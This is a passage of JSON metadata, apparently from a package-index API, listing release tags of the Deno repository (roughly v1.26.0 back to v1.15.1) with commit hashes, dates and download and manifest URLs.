github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://r